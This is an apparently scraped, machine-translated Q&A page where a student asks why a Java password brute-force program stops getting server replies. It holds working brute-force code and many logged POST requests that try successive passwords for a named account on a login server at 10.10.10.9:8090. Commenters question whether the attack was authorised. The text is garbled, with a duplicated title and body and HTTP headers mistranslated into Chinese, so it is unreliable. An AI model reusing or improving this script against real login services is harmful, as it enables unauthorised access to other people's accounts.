Java 蛮力算法不';无法从服务器获得适当的响应
作为大学作业的一部分,我正在实施暴力算法。我的程序每次用不同的密码向服务器发送post请求。问题是我只收到第一个请求的响应,对于后续请求,服务器根本不响应 这是代码 BruteForce.javaJava 蛮力算法不';无法从服务器获得适当的响应,java,algorithm,httpresponse,brute-force,http-post,Java,Algorithm,Httpresponse,Brute Force,Http Post,作为大学作业的一部分,我正在实施暴力算法。我的程序每次用不同的密码向服务器发送post请求。问题是我只收到第一个请求的响应,对于后续请求,服务器根本不响应 这是代码 BruteForce.java import java.io.*; import java.net.*; class BruteForce { private byte[] seq = new byte[]{0,0,0,0,0,0}; private char[] map = "abcdefghijklmnopqrstuvwxyz
import java.io.*;
import java.net.*;
class BruteForce
{
private byte[] seq = new byte[]{0,0,0,0,0,0};
private char[] map = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789".toCharArray();
public static void main(String[] args) throws IOException
{
BruteForce bf = new BruteForce();
bf.go(args[0]);
}
public void next(int i)
{
seq[i]++;
if(seq[i]==62)
{
seq[i]=0;
next(i-1);
}
}
public void go(String st) throws IOException
{
int l;
RequestReader reqMan = new RequestReader();
String t[] = reqMan.constructRequestString(new File(st));
String header = t[0];
String param = t[1];
t = null;
//SocketAddress addr = new InetSocketAddress("127.0.0.1", 8888);
//Proxy proxy = new Proxy(Proxy.Type.SOCKS, addr);
Socket s = new Socket();
InetSocketAddress dest = new InetSocketAddress("10.10.10.9", 8090);
s.connect(dest);
BufferedReader r = new BufferedReader(new InputStreamReader(s.getInputStream()));
PrintWriter w = new PrintWriter(s.getOutputStream());
//Actual BruteForce Algorithm
int index = 5;
while(seq[0] != 1)
{
String pass="";
//for(int j=0;j<6;j++)
//System.out.print(seq[j]+" ");
//System.out.println();
for(int i=1;i<=5;i++)
{
pass = pass + map[seq[i]];
}
//r = new BufferedReader(new InputStreamReader(s.getInputStream()));
String tp = header + "\n\n" + param.replace("password=","password="+pass);
System.out.println(tp);
w.write(tp);
w.flush();
while((l=r.read())!=-1)
System.out.print((char)l);
System.out.println();
try
{
Thread.sleep(10000);
}
catch(Exception e)
{}
next(index);
}
}
}
POST /login.xml HTTP/1.1
Host: 10.10.10.9:8090
Connection: keep-alive
Content-Length: 90
Origin: http://10.10.10.9:8090
User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.65 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://10.10.10.9:8090/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
mode=191&username=syedshahyasser.hussain.it14&password=aaaaa&a=1379675423937&producttype=0
HTTP/1.1 200 OK
Connection: close
Content-Type: text/xml
<?xml version='1.0' ?><requestresponse><status>LOGIN</status><message><![CDATA[The system could not log you on. Make sure your password is correct]]></message><logoutmessage>You have successfully logged off</logoutmessage><state></state></requestresponse>
POST /login.xml HTTP/1.1
Host: 10.10.10.9:8090
Connection: keep-alive
Content-Length: 90
Origin: http://10.10.10.9:8090
User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.65 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://10.10.10.9:8090/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
mode=191&username=syedshahyasser.hussain.it14&password=aaaab&a=1379675423937&producttype=0
POST /login.xml HTTP/1.1
Host: 10.10.10.9:8090
Connection: keep-alive
Content-Length: 90
Origin: http://10.10.10.9:8090
User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.65 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://10.10.10.9:8090/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
mode=191&username=syedshahyasser.hussain.it14&password=aaaac&a=1379675423937&producttype=0
POST /login.xml HTTP/1.1
Host: 10.10.10.9:8090
Connection: keep-alive
Content-Length: 90
Origin: http://10.10.10.9:8090
User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.65 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://10.10.10.9:8090/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
mode=191&username=syedshahyasser.hussain.it14&password=aaaad&a=1379675423937&producttype=0
POST/login.xml HTTP/1.1
主持人:10.10.10.9:8090
连接:保持活力
内容长度:90
来源:http://10.10.10.9:8090
用户代理:Mozilla/5.0(X11;Linux i686)AppleWebKit/537.36(KHTML,比如Gecko)Chrome/29.0.1547.65 Safari/537.36
内容类型:application/x-www-form-urlencoded
接受:*/*
推荐人:http://10.10.10.9:8090/
接受编码:gzip、deflate、sdch
接受语言:en-US,en;q=0.8
mode=191&username=syedshahyasser.hussain.it14&password=aaaaa&a=1379675423937&producttype=0
HTTP/1.1200ok
连接:关闭
内容类型:text/xml
登录您已成功注销
POST/login.xml HTTP/1.1
主持人:10.10.10.9:8090
连接:保持活力
内容长度:90
来源:http://10.10.10.9:8090
用户代理:Mozilla/5.0(X11;Linux i686)AppleWebKit/537.36(KHTML,比如Gecko)Chrome/29.0.1547.65 Safari/537.36
内容类型:application/x-www-form-urlencoded
接受:*/*
推荐人:http://10.10.10.9:8090/
接受编码:gzip、deflate、sdch
接受语言:en-US,en;q=0.8
mode=191&username=syedshahyasser.hussain.it14&password=aaaab&a=1379675423937&producttype=0
POST/login.xml HTTP/1.1
主持人:10.10.10.9:8090
连接:保持活力
内容长度:90
来源:http://10.10.10.9:8090
用户代理:Mozilla/5.0(X11;Linux i686)AppleWebKit/537.36(KHTML,比如Gecko)Chrome/29.0.1547.65 Safari/537.36
内容类型:application/x-www-form-urlencoded
接受:*/*
推荐人:http://10.10.10.9:8090/
接受编码:gzip、deflate、sdch
接受语言:en-US,en;q=0.8
mode=191&username=syedshahyasser.hussain.it14&password=aaaac&a=1379675423937&producttype=0
POST/login.xml HTTP/1.1
主持人:10.10.10.9:8090
连接:保持活力
内容长度:90
来源:http://10.10.10.9:8090
用户代理:Mozilla/5.0(X11;Linux i686)AppleWebKit/537.36(KHTML,比如Gecko)Chrome/29.0.1547.65 Safari/537.36
内容类型:application/x-www-form-urlencoded
接受:*/*
推荐人:http://10.10.10.9:8090/
接受编码:gzip、deflate、sdch
接受语言:en-US,en;q=0.8
mode=191&username=syedshahyasser.hussain.it14&password=aaaad&a=1379675423937&producttype=0
正如您所看到的,第一个请求和响应的行为与它们应该的一样。从那时起,请求被发送,但响应没有到达。也许服务器足够聪明,知道你在做什么,并且拒绝响应?那么它就不应该响应第一个请求。它会响应第一个请求,因为它无法区分你的程序和真正的用户。当您开始尝试将其淹没时,很容易理解您试图对其进行暴力。可以说,服务器在所有尝试中的行为都是正确的。它对第一次尝试作出了尽可能快的反应。当第二次和随后的尝试来得太快而不是用户键入的结果时,它停止响应。我希望您的指导老师事先与服务器所有者进行了安排-可能有一个日志条目记录了暴力攻击。我更改了代码,使线程在发送下一个请求之前休眠10秒。不过,没有回应。
POST /login.xml HTTP/1.1
Host: 10.10.10.9:8090
Connection: keep-alive
Content-Length: 90
Origin: http://10.10.10.9:8090
User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.65 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://10.10.10.9:8090/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
mode=191&username=syedshahyasser.hussain.it14&password=&a=1379675423937&producttype=0
POST /login.xml HTTP/1.1
Host: 10.10.10.9:8090
Connection: keep-alive
Content-Length: 90
Origin: http://10.10.10.9:8090
User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.65 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://10.10.10.9:8090/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
mode=191&username=syedshahyasser.hussain.it14&password=aaaaa&a=1379675423937&producttype=0
HTTP/1.1 200 OK
Connection: close
Content-Type: text/xml
<?xml version='1.0' ?><requestresponse><status>LOGIN</status><message><![CDATA[The system could not log you on. Make sure your password is correct]]></message><logoutmessage>You have successfully logged off</logoutmessage><state></state></requestresponse>
POST /login.xml HTTP/1.1
Host: 10.10.10.9:8090
Connection: keep-alive
Content-Length: 90
Origin: http://10.10.10.9:8090
User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.65 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://10.10.10.9:8090/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
mode=191&username=syedshahyasser.hussain.it14&password=aaaab&a=1379675423937&producttype=0
POST /login.xml HTTP/1.1
Host: 10.10.10.9:8090
Connection: keep-alive
Content-Length: 90
Origin: http://10.10.10.9:8090
User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.65 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://10.10.10.9:8090/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
mode=191&username=syedshahyasser.hussain.it14&password=aaaac&a=1379675423937&producttype=0
POST /login.xml HTTP/1.1
Host: 10.10.10.9:8090
Connection: keep-alive
Content-Length: 90
Origin: http://10.10.10.9:8090
User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.65 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://10.10.10.9:8090/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
mode=191&username=syedshahyasser.hussain.it14&password=aaaad&a=1379675423937&producttype=0